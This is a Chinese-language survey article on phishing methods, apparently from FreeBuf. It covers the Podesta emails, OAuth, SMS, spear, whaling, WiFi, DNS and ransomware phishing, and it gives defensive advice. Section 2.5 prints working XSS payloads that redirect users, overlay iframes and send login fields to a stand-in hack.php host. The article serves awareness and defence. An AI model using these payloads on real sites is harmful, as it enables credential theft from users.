一、前言
1.1 “邮件门”
美国大选已经告一段落,特朗普干翻希拉里成功入主白宫。希拉里的落败原因有很多,但有一点我们还是不得不提,那就是沸沸扬扬的“邮件门”事件。
“邮件门”这件事比较复杂,辣条君只能简单地讲一讲。大抵就是希拉里竞选团队的负责人波斯得塔的邮件被黑,导致很多邮件泄漏,其中包括了各种丑闻记录,这些记录让希拉里形象一落千丈。间接地导致了竞选的失利。
那么问题来了,原本处于绝密状态的邮件为啥会被公之于众?
没错,钓鱼邮件。这也多亏希拉里的一班猪队友,波斯得塔在错误的时间点开了错误的邮件。这封邮件大意就是说有人试图在乌克兰登录波斯得塔的Gmail账户,但没有成功,提示波斯得塔马上修改密码。在团队职员确认邮件后,波斯得塔点开了邮件,然后输入了密码,黑客通过此密码从他的邮箱下载了数万的电邮,将其交给维基解密,于是就出现了“邮件门”丑闻。
小小的钓鱼邮件就能对美国大选产生如此大的影响,足见,网络钓鱼的危害有多大。而随着互联网技术的高速发展、电子商务平台的大规模应用和推广、黑客攻击驱动力的变化,网络钓鱼出现了新的转变。作为一种主要基于互联网传播和实施的攻击,“钓鱼攻击”(Phishing Attack)正呈逐年上升之势,并且手段也在逐渐丰富、变化,网络钓鱼变得越来越难以对付。
1.2 网络钓鱼?这是什么东西?
网络钓鱼,从字面上理解就是通过网络来实行钓鱼的一种行为,这种做法类似姜太公钓鱼,愿者上钩。对于网络钓鱼,国际反钓鱼网站工作组APWG(Anti-Phishing Working Group)给出的定义如下:
一种利用社会工程和技术欺骗,针对个人身份数据和金融帐号进行盗窃的犯罪机制。
1.3 什么是社会工程攻击?
提到社会工程不得不提一个人。相信对网络有较深入的玩家都知道凯文·米特尼克。他是黑客中的王者。在他身上体现了什么是真正的社会工程。他缔造了一个又一个神话。15岁侵入“北美空中防务指挥系统”的计算主机内。紧接着又侵入了“太平洋电话”公司,更改了数据库中的数据。这只是凯文·米特尼克辉煌历史中的一个小片段。他获得的成就仰仗的不仅是传统的系统入侵,更主要的是社会工程学。社会工程就是利用人的心理弱点(如人的本能反应、好奇心、信任、贪婪)、规章与制度的漏洞等进行诸如欺骗、伤害等手段,以期获得所需的信息(如计算机口令、银行帐号信息)。这类攻击在网络罪犯群体中备受青睐。
二、手起刀落,钓鱼手法、种类节选
在过去,网络钓鱼仅仅只是简单的攻击,比如攻击者发送一条带有跳转信息的链接,然后引诱用户在自己的电脑上运行恶意代码。但现在,网络钓鱼已经大大的超出了以前的范畴,尽管概念没有变,但手法却变得异常复杂,有的钓鱼甚至是好几种技术结合在一起的,有的则颠覆了我们对钓鱼的传统看法。接下来,FB小编就带你绕地球一周,看看oAuth钓鱼、基于伪基站的短信钓鱼、邮件钓鱼、XSS钓鱼等一系列的钓鱼手法。由于钓鱼手法实在是名目繁多,小编就只选其中的一部分来做描述,也希望各位轻喷。
2.1 颠覆传统思维的钓鱼——利用oAuth 钓鱼
这种钓鱼方式在FB先前的文章中有介绍,这里就不做具体阐述,大家可以参考《案例分析:利用oAtuh钓鱼》一文。在我们印象中,网络钓鱼的过程通常是黑客引诱用户输入账号密码,然后盗取你的数据。但利用oAuth钓鱼则颠覆了这一传统思维,并不需要你输入你的密码,而是通过对应用的授权,获取accessToken以API请求的方式获取所有的资源。更可怕的是,传统的防御手法对这个钓鱼一点用处也没有,什么双因子认证,Smart Screen,什么安全意识,在oAuth面前都是那么苍白无力,因为人家根本不用这些东西。
oAuth攻击大概分为以下几个部分:
1、创建一个应用Sappo
2、利用该应用创建一个申请授权的链接(SCOPE)
3、用户给应用Sappo授权后,获取AuthCode
4、利用AuthCode获取accessToken
5、使用accessToken以API请求的方式获取所有资源
这种手法是授权在Windows下进行的,浏览器也认定该请求是合法的请求,最重要的一点是整个过程没有让你输入账号密码(就算是输入了账号,也是用于登录合法网站的,与钓鱼网站并无关系),所以,我们根本不能辨别出这是一个钓鱼事件,就算是专业人士,也不一定能识别出来。
怎么办?从我们用户的角度来看,给应用授权的时候一定要十分小心,并且对给予应用授权的权限要仔细斟酌,特别是某些包含敏感数据的应用更加要慎重。还可以采取其他的手段来对应用进行限制,比如当用户从门户进来时,才可以进行解密然后浏览数据,而当API到来的时候,看到的数据都是加密的。
2.2 伪基站策略之短信钓鱼(Smshing)
不知道大家对伪基站熟悉不熟悉?现在的多数短信钓鱼都是建立在伪基站短信钓鱼的基础上进行的。伪基站顾名思义就是假基站,设备一般由主机和笔记本电脑组成,通过短信群发器、短信发信机等相关设备,利用2G网络单向鉴权的漏洞,搜寻到一定半径范围内的手机卡信息,“劫持”用户的手机信号,模拟成任意手机号码向用户发送短信。
伪基站整体思路
举个栗子,某君某一天受到了伪基站钓鱼的攻击。话说某君在上班途中,收到了来自95555的通知短信,该短信是银行短信中心的积分兑换提醒。
图中的前两条短信是正常业务的,最后一条是才收到的。略微一看,没有什么不对。但仔细观察的话,你就会发现如下疑点:
1.地址略微不同,正常的应该是类似cmbt.com这种;
2.标点符号全半角混用,这个不注意还真看不出来。
当然,最容易让我们迷惑的是发送方来自95555,而且你拨号的时候,有些手机还会出现招商银行的图标:
如果你对信息详情进行检验之后,你会发现猫腻藏在这里。
将两个短信对比,会发现发送时间和服务中心均不同,假短信发送时间已经好几年了,查了一下相关的资料发现:短消息点对点协议(CMPP,SMPP)中,对短信生命周期的约定是最长48小时。另外,手机接收到的短信息,都会显示发送者的短信中心(SMSC)。由此断定,这个短信是来自伪基站,而不是正常的移动网络。
如果你打开短信中的链接,攻击者就会引导你做一系列操作,最终目的是让你下载一个app。在app安装后,会将桌面图标隐藏起来,还会获取一系列高危权限,如开机自启动,收发短信等,最为严重的是,控制者尝试偷取受害手机里的X.509证书文件(该证书包含了手机的所有敏感信息,如版本号、序列号、签发人姓名等)。最后,手机沦为控制者的肉鸡,控制者就可以通过手机为非作歹了,而机主并不知道发生了什么。
伪基站确实杀伤力十足,而我们日常又疏于防范,对我们造成了很大威胁。当然,还有其他的短信钓鱼方式,这里就不一一枚举了。
2.3 鱼叉式网络钓鱼(Spear phishing)
在网络安全领域工作的人都知道,网络钓鱼攻击,特别是针对大型企业的网络钓鱼攻击正在崛起。这一类攻击基本上都是采用鱼叉式网络钓鱼(Spear Phishing),该类攻击可以入侵所有的防御层,成功率非常高,可以针对不同的平台。无论是Linux、Mac OS、还是windows都是其狩猎的目标。最近几年发生的数据泄漏事件也大多始于鱼叉式网络钓鱼攻击,并且90%的APT攻击也是通过网络钓鱼来完成的。
鱼叉式网络钓鱼源于亚洲与东欧,这种手法主要是针对特定人群目标的钓鱼攻击,比如企业高层,特定的政府部门以及其他敏感的企业(各位如有兴趣,可以在此查看网络钓鱼的时间轴)。
在鱼叉式钓鱼攻击的案列中,最著名的当属RSA安全公司被黑事件。RSA是一家全球顶级的安全公司,致力开发双因素用户认证、加密和公钥管理系统。2011年,攻击者向RSA公司的母公司EMC的4位员工发送了两封不同的鱼叉式钓鱼邮件,该邮件有一个包含了0day漏洞的恶意附件——2011 Recruitment Plan。这个附件的妙处就是,只要4人中的任意一人点击该附件,这个漏洞利用就会对Adobe Flash中的漏洞发起攻击,并在受害者的电脑中预留后门。(RSA传送门1,2)
通过该后门,攻击者可以对该公司网络系统进行有价值的侦测和映射。最终,通过不懈努力,攻击者成功窃取了该公司SecurID双因素认证产品的信息。
其实,此类案列的教育意义更大于实际意义。像这种做安全行业巨头,按理说,公司的每个员工都应该是训练有素、安全意识非常高的,他们应该知道如何应对可疑邮件。然而,这名员工还是执意要查看邮件内容,他竟从垃圾箱将其恢复并打开了它,更讽刺的是,邮件过滤器已经将其标为可疑文件,由此可见,安全不见得“安全”,总有好奇宝宝禁不住诱惑,企业安全意识教育刻不容缓。(由于RSA拒绝提供病毒副本,市面上并没有脚本流出,想做案例分析也没辙)
2.4 艺术的欺诈者——鲸钓(Whaling Phishing)
鲸钓跟前面的鱼叉式网络钓鱼有相似之处(关于spear phishing和whaling phishing的区别,大家可以阅读这一篇文章),都是针对特定的人群来进行社会工程攻击,不过这两者还是有一些差别。鲸钓虽然说也是targeted attack,但目标主要还是集中在带C字头的企业高管,政界人士和名人(这些人就是所谓的“鲸”),从受众面来看,鲸钓似乎影响会更大(其实我们可以从字面来看,一个是钓鱼,一个是鲸,哪个造成的危害更大,一眼就看出来了),但实际上攻击者更愿意选择鱼叉式网络钓鱼(或许是成功率更高)。
据国外相关机构的统计,大约35%的CEO和CFO受到过鲸钓攻击。如此严重的情况必然逃不过FBI 的法眼。据FBI的统计显示,自2015年1月以来,鲸钓的受害者已经增加了270%,而从这些骗局在过去3年已经让这些公司损失了至少23亿美元,受影响的国家超过80个。比如美泰公司在2015年就因为一个CEO骗局而损失了300万美元。
2.5 XSS钓鱼
XSS(跨站脚本)钓鱼,我与跨站脚本攻击结缘是在《白帽子讲Web安全》那本书中,在白帽子中,第一个讲的攻击类型就是XSS,所以印象较为深刻。XSS本名为CSS,但为了避嫌,忍气吞声的被人叫做XSS。XSS攻击通常是指黑客通过“HTML注入”篡改了网页,插入了恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击,因为一开始的案例演示是跨域的,所以叫做“跨站脚本”。XSS破坏力巨大,产生的场景也复杂。
而现在,XSS更是被广泛的用于网络钓鱼,对我们造成了很大的威胁。XSS钓鱼主要有重定向钓鱼、HTML注入式攻击、XSS框架钓鱼以及flash钓鱼等。
2.5.1 重定向钓鱼
URL重定向是指当使用者浏览某个网址时,将他导向另一个网址的技术。这种类型的钓鱼一般是将较长的网站网址转换成较短网址。因为当要传播某网站的网址时,常常因为网址太长,不好记忆;又有可能因为换了网路的免费网页空间,网址又必须要变更,不知情的使用者还以为网站关闭了。这时就可以用网路上的转址服务了。这个技术使一个网页是可借由不同的统一资源定位符(URL)连结。如正常的用户URL为http://localhost/cookie1.php?user=UserName&pass=PassWord&name=login,由于我们的程序并没有对提交的数据进行处理,而直接输出,那么用户就可以通过提交特定的数据实现重定向。
当用户访问的时候,页面就被重定向至钓鱼页面。
http://localhost/cookie1.php?user=<script>document.location.href="http://127.0.0.1/phishing.html"</script>&pass=PassWord&name=login
2.5.2 HTML注入式攻击
利用XSS向页面中插入HTML/Javascript代码,由于没有进行过滤,代码将直接被浏览器解析。
http://localhost/cookie1.php?user=%3Cscript%3Evar%20biaodan=document.getElementById%28%27login%27%29;biaodan.style=%22display:none%22%3C/script%3E%3Chtml%3E%3Cform%20action=%22192.168.0.1/hack.php%22%20method=%22get%22%3E%3Cinput%20type=%22text%22%20name=%22user%22%20value=%22UserName%22%3E%3Cinput%20type=%22text%22%20name=%22pass%22%20value=%22PassWord%22%3E%3Cinput%20type=%22submit%22%20name=%22name%22%20value=%22login%22%3E%3C/form%3E%3C/html%3E&pass=&name=login浏览器解析后,隐藏了原来的登录表单,生成了一个新的表单并将数据提交到指定的地址。
2.5.3 XSS框架钓鱼
此类钓鱼是通过<iframe>标签嵌入一个远程域,以覆盖原有的页面(POC在这)。
<div style="position:absolute;top:0px;left:0px;width:100%;height:100%"><iframesrc=http://127.0.0.1/phishing.html width=100% height=100%></iframe></div>
在写出代码片段后,在我们访问登录页面时,会发现正常页面一闪而过,然后就跳转至我们所设定的钓鱼页面。
通过源代码不难看出,整个页面已经被一个frame框架覆盖,并且数据提交地址已经改变。现在,只要你输入帐号之类的信息,这些数据就会提交至我们的服务器,我们服务器会将其保存下来,url也会跳转至我们指定的地址。
XSS钓鱼带来的危害非常大,在XSS攻击之后,攻击者除了可以试试”Cookie劫持”外,还能通过模拟GET、POST请求操作用户的浏览器。我们可以通过加验证码或者在修改密码的时候要求用户输入旧的密码等简单方式来预防XSS钓鱼攻击。但这并不是万能的,只能在一定程度上减少被攻击的概率。
2.6 克隆钓鱼(Clone phishing)
克隆钓鱼,顾名思义,就是将某个网站克隆下来,将其中的某环节篡改,然后将受害者引导至钓鱼页面;或者是制作一个UI界面一样的可执行程序,以此来让用户上当。克隆钓鱼基本上会采取web、exe、URL等方式。
与其他类型的钓鱼一样,克隆钓鱼也可能会要求你输入账户信息等,就像你在登录正规网站的时候做的那样。
与其他手法的网络钓鱼相比,克隆钓鱼应该是对技术要求比较低的。在应对简单克隆时,我们甚至不需要借助专业的工具,因为浏览器本身就支持源码查看功能,只要将这些源码保存下来(可以借助迅雷等下载软件)就可以对网站进行克隆。当然,你如果要进行复杂的克隆活动,就需要借助专业的工具来进行了。
克隆钓鱼造成的危害也不容小觑,由于网站或者邮件做的很逼真,一般的受害者都没有办法分辨真假,因此很容易上当。遇到自己不熟悉的网站或者邮件,留一个心眼,千万确认没有问题以后才点进去。
2.7 点击图片背后的风险——图片钓鱼(Picture Phishing)
在我们浏览某个信任的网站的时候,如果评论区的某张图片看不清楚,你是不是有一种冲动打开它呢?如果你打开该图片,大概会有2种情况发生:
新窗口打开: 源网站被改变成钓鱼网站。
源窗口打开: 你打开该图片,看完后点击浏览器上的返回按钮,继续返回浏览评论。
其实,这个过程就是黑客下手的地方。黑客完全可以让用户点击浏览器“返回”按钮锁返回的地址不再是原来的那个网址,而是黑客精心构造的钓鱼网址。
黑客是如何做到的?其实,也不是多大的难事。黑客往往会对图片的大小做修改,让它看起来比较模糊,由于人的猎奇心理,很多人都会忍不住点击并打开查看。因为现在网站基本上都支持图片的缩放,殊不知,黑客正是利用了这一点来制造图片钓鱼攻击的。例如:
在评论区里看到的图片应该是下面这个样子的。
当你手贱,忍不住打开图片的时候,就会是这样子的。
当你打开后,确实能看到原来那张图片的放大版。但与此同时,原来那个网页却正在悄悄的改变……
这里为了更加直观,我们使用Google来演示。在实际运用中,也许我们可以转到一个与原来网站一模一样的页面,提示用户登陆,我们甚至可以完全模拟该网站,仅仅把网站的内的下载链接篡改成自己的病毒软件。(如需要查看完整案例,请点这里)
在现在这个几乎上人手一部电脑,人手一部智能手机的时代,图片钓鱼出现的几率相比之前也大大增加,而且引诱手段也不止文中提到的这一种。我们往往会忽视一个细节,越简单的钓鱼手法,上当的人就会越多,因为大家都疏于防范。
要避免这类攻击,小编教你一个小技巧。就是小心再三,关注一下你点开的链接。使用右键,选择在新标签中打开链接来打开新的链接。这里我想起了某61°的广告词,多一度关怀,多一度热爱,乃们是不是感受到了latiaojun深深的爱呢,同意的点个赞,评个论啥的~~~
2.8 Wifi钓鱼 (Wifi phishing)
随着智能终端飞速发展,手机的WIFI也在快速的普及着,可以说,wifi现在已经成为我们生活的一部分。生活之中到处都充满着wifi,公车、地铁、公司、家里、公共场所也会有wifi。甚至可以这样说,没有电脑我们能活,但如果缺少wifi,小编恐怕80%以上的人都要抓狂了吧。(FB已经有类似的文章,请参考)
WIFI在方便我们的同时,也为一些心怀不轨的黑客提供了钓鱼便利,他们会偷偷搭建钓鱼WIFI,如果你连接到这些WIFI后,很可能就会导致你的手机的个人信息被盗,出现各种异常。比如,你在星巴克搜索到了两个wifi名字同时为——Starbucks,那你就得注意了,黑客很可能在这里为你设置了一个陷阱。
这类攻击一般都是用目标机器(物理机或者虚拟机)搭建一个网络确保用户能够接入无线热点,然后用无线网卡来嗅探和注入数据包,将附近的访问点列出来,记下BSSID和channel的值和MAC地址,然后用DHCP服务器提供一个假的接入点,然后就可以通过抓包工具抓包。
一旦你的无线设备连接到攻击者搭建的假无线wifi,会被钓鱼者反扫描,而如果你的手机正连在网站上进行数据通讯,钓鱼者就会获得你的用户名和密码。
通过wifi钓鱼,攻击者除了能盗取到用户的银行账户、网络支付密码外,还能利用相应软件截获数据包,并用分析软件破译用户使用过的wifi密码等等。除了假wifi外,攻击者还会使用“DNS劫持”、“ARP欺骗攻击”等手段对用户进行攻击,导致网络瘫痪,用户敏感数据被盗等。
个人建议大家在公共场合尽量使用2G/3G/4G网络,别随便连接wifi;在日常使用wifi设备时,最好关闭wifi自动连接,这样就可以减少很多被钓鱼的几率;在选择wifi时,一定要选择官方的wifi,在公共场合使用网银或者支付平台,防止个人敏感信息泄漏。
2.9键盘记录器钓鱼
键盘记录器也被称作键盘屏幕全记录,这是一种专门用来记录键盘监控以及屏幕监控的记录器。这家伙从诞生到现在,长得是越来越靓了。看几张前后照片对比。
记得安全研究员Samy Kamkar设计了一款外形伪装成USB充电器的无线键盘记录仪KeySweeper,虽说小小的体格萌萌哒,但它却可以秘密的记录附近无线键盘的敲击数据,并可将该数据通过Internet或蜂窝数据网络发送给后台。今年5月,FBI就曾向公众发出警告,千万要小心警惕使用廉价的USB充电装置,因为它有可能就是一个KeySweeper,会导致个人敏感信息、财务信息或其他重要的信息被窃取。
KeySweeper内部靓照
这种软件包含基于web的工具,可以用来实现对keystroke的实时监控。不光如此,这种工具制作起来也灰常简单(制作教程下载:Github),价格也不贵,大概每个在10-80美元之间。当有特定类型的击键时(如用户名或者URL),该工具就会向攻击者发送短信警报。在该设备记录键盘的同时,它仍能继续接收Web工具发送的指令。另外,即使KeySweeper从电源中被拔掉也还能继续工作,因为它内置了可充电电池。
对于这类攻击,FBI建议我们要减少无线键盘的使用,因为这类设备可以对无线键盘数据进行记录并发送给攻击者,如果你一定要使用无线键盘,那么最好对要传输的数据进行强加密。(关于FBI的建议,请移步至此)
2.10 会话劫持钓鱼
我们知道,多数钓鱼方法是想办法让用户点击恶意URL,Session劫持则是劫持会话,即使用户正在访问合法网站,也会被重定向到钓鱼网站上去。结合现在大规模的家用路由漏洞,这种方法效果就更好了。
2.10.1 域名解析攻击
典型的例子是DNS缓存中毒,通过污染DNS缓存来达到目的。但这种手段攻击成本高、影响大,黑产讲究的是简单实用,于是我们就看到更简单的办法,直接篡改主机上的host文件,这就容易多了,而且也很容易通过恶意软件传播。
2.10.2 XSS攻击
理论上XSS攻击可以用来做很多事,wooyun网上常见的是盗取cookie技术,不过这种手段无疑不符合黑产简单实用的作风,用在黑产里的跨站,多数还是url重定向这一类。
2.10.3 中间人攻击
中间人攻击的定义比较广泛,总体意思是攻击者能够拦截、读取、修改通信内容。
2.11实时交互式网络钓鱼
这种钓鱼攻击在前段时间发生在巴西,发生在攻击者和受害者之间的网络会话中。这种类型的攻击能够模拟目标网站的外观和感觉,而不仅仅只是一般的钓鱼页面。
在这个案例中,攻击者隐藏在幕后,充当银行的角色,并以银行的角度与受害人通过网络进行会话,要求受害者提供账户的详细信息。整个流程如图所示:
其实,攻击者是利用了一个控制面板来操纵着整个会话。他们可以在面板之中预先设置好一些固定的会话内容,让消息看起来更逼真。
我们可以看到,该面板之中有很多个人的敏感信息选项,攻击者都会一一询问。在取得这些信息后,攻击者会对信息进行验证,如果验证不通过,则攻击者会给受害人一个错误的消息。在新的信息到来之前,会有一条请稍后的信息,受害者只能干巴巴的等着。
一旦信息验证通过,攻击者会发送一条“更新成功”的消息来结束会话,并在管理面板上将攻击标记为“finalizada”(完成),意味着攻击的完成。但是,还有很重要的一点,受害人只能在24小时后才能继续访问该网站,因为攻击者会利用这段时间来抹去犯罪痕迹。
从这个手法来看,攻击者做的比较成功的就是根据受害者的请求实时更新会话内容,让这种攻击看起来很逼真。在这个攻击面前,受害者的token、电子签名、支付卡密码等信息暴露无余,而通过24小时的时间,犯罪分子能将犯罪证据清除,从而加大了追踪的难度。
专家建议我们使用ATO(account takeover -账户托管)来检测这类攻击,同时,良好的上网习惯也是必须的。(完整案例点击此处)
2.12 高级钓鱼艺术——DNS中断
其实,攻击者无论使用伪基站、还是wifi钓鱼,我们都可以通过细心来避免,但如果黑客通过技术手段修改了你的DNS,多数人都得哭爹喊娘。说起DNS,大家的第一印象肯定是“我靠,难道又发生DDoS攻击了吗?”如果说你没有听说过DNS钓鱼攻击,那我就会觉得你比我还low。
DNS的工作原理及DNS劫持钓鱼路径图
由于大环境的发展,互联网社区对网络钓鱼的的辨别程度也越来越高,传统的手法很难对互联网用户造成伤害。于是,明智的黑客放弃了直接用邮件劫持用户账户的方法,转而用DNS中断或重定向来影响域名系统,发起钓鱼攻击。
DNS全称Domain Name System,在网络实现过程中担当着重要的角色。DNS保存有该网络中所有主机的域名和对应IP地址,并将域名转换为IP地址。一旦遭到非法篡改,用户将很可能被导向钓鱼网站。
在今年9月份,国内就发生了一起严重的DNS钓鱼攻击事件。相比之前,这次的钓鱼攻击要严重得多,黑客利用宽带路由器的缺陷对用户DNS进行篡改,用户只要浏览一下黑客所掌握的web页面,其宽带路由器的DNS就会被篡改。由于该web页面没有特殊的恶意代码,安全软件的扫描和防护也就成了摆设,导致大量用户被DNS钓鱼诈骗。
这次的DNS钓鱼诈骗还搭上了CSRF(跨站请求伪造),经过两个CSRF后,用户的访问就会通过攻击者的服务器,这样一来,攻击者就可以随时进行劫持了。此次大概思路如下:
1、攻击者诱骗受害者通过浏览器访问有CSRF攻击代码的页面,在受害者访问页面时,CSRF代码执行;
2、在执行第1个CSRF时,用默认账户密码登录IP地址,然后默认的登录会形成一个列表,然后代码执行遍历;
3、第1个CSRF成功后,目标路由设备会有个合法的Cookie植入到受害者浏览器端;执行第2个CSRF:将DNS的IP修改为攻击者准备好的服务器IP。这次的执行,浏览器会带上第1次的合法Cookie,所以修改可以成功。
然后,用户的访问请求就会经过攻击者的服务器,攻击者就可以做各种劫持了。这种攻击综合了DNS与CSRF,属于一种比较复杂的攻击。攻击者挖空心思来让用户数据转移到攻击者服务器上去,用户在执行访问的过程中,也很难觉察到异常,不明不白的就上了攻击者的套了。
2.13 勒索软件与网络钓鱼结合威力无穷
传统思维中,勒索软件与网络钓鱼基本是没有什么关系。但是,我们不得不正视一个严重的事实,现在90%以上的钓鱼邮件都包含了勒索软件,第一季度为93%,但到了第三季度,就上升为97.25%(Phishme)。
为什么勒索软件会和钓鱼邮件结合在一起?有三个特性造成了这一现象,一是钓鱼邮件传播快,二是勒索软件造成的危害大,三是相对其他手段,赎金价格低,大家乐于接受。如果你看一下支付赎金的价格,你也觉得这没有什么,因为赎金的价格基本上为1-2个比特币,按照目前的汇率,也就是400美元-800美元,这对大多数中小企业来说,也是容易接受的。多数企业会选择支付赎金,拿回被加密的东西。正是由于有机可乘,越来越多的人加入到这一队伍中。
除了勒索软件外,还产生了一个变种——Soft targeted(软目标)。这个变种处于BEC和鱼叉式网络攻击之间,目标人群为特定工作范畴的人,软目标增加了钓鱼邮件的可能性。
2.14 高级自动化钓鱼框架,是福还是祸?
该框架是在新西兰黑客会议kiwicon上,由网络安全专家Michele Orru发布的,通过这个框架,黑客能在数分钟内搭建一个钓鱼环境,进行精确的钓鱼攻击。本站在之前的文章《高级自动化钓鱼框架PhishLulz已经发布,是灾难还是救星?》中已有报道,在这里就不赘述了。这个自动化钓鱼框架的出现,到底是福还是祸,我们拭目以待。不过,这一个思想还是值得我们去学习和研究。
2.15 错误配置的临时URL
钓鱼网站往往会在短时间内就会被安全产品列入黑名单,因此钓鱼者需要购买很多域名或者感染大量的网站。为了追求效率,一些钓鱼者探索出了一种新的钓鱼方式:利用网络主机服务配置不当的临时URL。(传送门)
这种钓鱼手法主要利用了托管服务提供商的一个特性,当你通过托管服务提供商创建一个新账户后,托管服务提供商会提供一个URL,这个URL的作用是让用户在将网站链接到域名之前进行测试。
通常,这些临时的URL长这个样子。
http://server-name/~username/在这里,server-name是web主机域名或者是服务器的IP,用户名则是用户账户名,这是正常的结构。但是,很多服务商却没有正确的对临时URL做出匹配。一旦URL没有被正常配置,攻击者就可以通过同一服务器上的任意域名访问某个用户的文件。攻击者还可以在共享服务器上编制其他第三方站点列表名单。
这类缺陷使得一个服务器账户可以给攻击者提供数百个不同的域名,并让他们的恶意页面免费使用。他们可以频繁的更换域名,就算之前的域名被拉进黑名单,攻击者也不用转移自己的文件,省去了很多麻烦。
要应对这个也不难,网站站长要经常检查自己的域名来确定自己的域名是否安全。
2.16 使用JavaScript静默窃取凭据
一位名为@dvk01uk的twitter用户发文称,自己发现了一封来自paypal的钓鱼邮件,这封邮件看起来是一个“正常”的paypal邮件。表面上看起来没啥问题。
这封邮件告知用户其账户存在异常活动,并请求他们下载附件中的HTML文件并提交相关信息。而且该邮件的表格中提交的按钮貌似还是指向合法的paypal域名。
在经过进一步分析,一旦加载并运行包含HTML文件的页面,JavaScript会拦截所有通往PayPal.com的数据,并将截取到的数据发送到攻击者的服务器,攻击者会记录你所有的详细信息,而你的浏览器仍会访问正常的PayPal网页。这种方法对于一般用户来说简直是天衣无缝,他们并不知道,一大波信息正源源不断的输送到攻击者那里。(传送门)
还有其他很多钓鱼思想,如云账户钓鱼,恶意构造URL钓鱼,修改SPF等,这里只是列举一小部分,其他的手法以后一一奉上。
三、网络钓鱼之“新”
3.1 在早晨或午餐后开始钓鱼攻击更容易得手
此语出自意大利“老司机”Orru,在前不久举行的新西兰黑客大会Kiwicon上,Orru总结得出,在早晨或者午餐后发送的钓鱼邮件更有成功率。在Orru对澳大利亚官员调查测试的过程中,有40%的澳大利亚公务员打开了钓鱼电子邮件,并且还发送了各种VPN登陆口令。而Orru这个“老司机”在短短两天内就获取到了各种域名的管理权限。实际上,针对邮件钓鱼的思路还是很多,而且普通员工很难注意到.com和.co邮件的区别。
3.2 每30秒,钓鱼者就会发起一次钓鱼攻击
据反钓鱼组织APWG的统计,2016年前三季度,整个网络钓鱼的数量达到前所未有的高度,检测到的钓鱼攻击就多达上百亿次。相当于每30秒,钓鱼者就会发起一次新的攻击,零售业/服务业,金融业以及支付业已经是千疮百孔,伤痕累累。 如图:
数据来自卡巴斯基实验室
3.3 中国又是一骑绝尘
中国又一次“称霸”武林,独占鳌头,真的好心疼咱中国的网民,要与强大的钓鱼者做坚持不懈的斗争。
网络钓鱼地区分布示意图
数据来源:APWG
3.4 “你的”“有”“账户”是大家最喜欢用的关键字
从上图中我们可以看出,网络钓鱼的主题基本上离不开“你的”“账户”“有”之类的,在一定程度上解释了攻击者的意图,同时也给我们提了个醒,遇到有这一类关键字的邮件时,要特别注意。
结束语
通过以上的分析,我发现现在钓鱼攻击有着以下特点:
1、针对性和目的性都比较强(鱼叉式钓鱼和鲸钓);
2、攻击手段丰富化,出现了多种新的钓鱼思路(勒索软件、伪基站、Javascript静默窃取);
3、传播途径多样化(搜索引擎、邮件、短信);
4、利润催生网络钓鱼朝着产业化发展(钓鱼框架),也催生出地下黑色产业链。
面对如此的形式,我们的传统方案在应对的时候却显得力不从心,先天不足严重制约了与网络钓鱼的对抗:
1、解决方案完整性不足,方案比较分散,对问题并没有提出彻底的解决方案;
2、我们主要采用被动防御,而此类防御方式效果并不好;
3、我们对钓鱼攻击的控制力度与范围都有限,这就导致了很多监管死角,很容易就发生网络钓鱼攻击;
4、到现在为止,我们并没有形成一个协作的平台,都是采取单兵作战,力量分散,造成预警方式单一,加大了钓鱼攻击的概率。
钓鱼攻击已经成了一个非常严重的网络威胁,而对抗钓鱼攻击,不再是单一用户或某个企业、行业单独面临的问题,而是成了大家共同关注的焦点。考虑到速度和效率,对抗钓鱼攻击注定是一项耗时耗力的资源密集型工作。只有大家一致行动,建立多方协作的平台,才能最大限度的减少钓鱼攻击造成的损失。
不断提高技术力量,对网络钓鱼防治结合,争取在网钓萌芽阶段将其扼杀在摇篮之中。
当然,所有的活动都归结于人,因此,对抗钓鱼攻击的重中之重是人要提高人的意识,培养一个良好的习惯,这样才能最大程度减少钓鱼攻击的发生。
参考:
【1】http://ixuehua.blog.163.com/blog/static/259952038201642532524650/(XSS案例代码)
【2】https://github.com/sophron/wifiphisher (wifi钓鱼代码)
【3】https://securityintelligence.com/new-live-interactive-phishing-attacks-emerge-brazil/ (实时会话钓鱼)
【4】http://securityaffairs.co/wordpress/47637/hacking/fbi-notification-keysweeper.html (键盘记录器)
【5】https://blog.sucuri.net/2016/06/phishers-abuse-hosting-temporary-urls.html (错误配置URL)
【6】https://www.grahamcluley.com/phishers-using-javascript-redirect-steal-paypal-credentials/(用Javascript静默窃取受害者数据)
【7】http://www.freebuf.com/articles/web/119615.html(oAuth钓鱼)
【8】http://www.freebuf.com/articles/web/116003.html(图片钓鱼)
【9】https://www.wired.com/2015/04/hacker-lexicon-spear-phishing/;https://www.wired.com/2011/08/how-rsa-got-hacked/。(RSA案例)
*本文由居正摘自FreeBuf
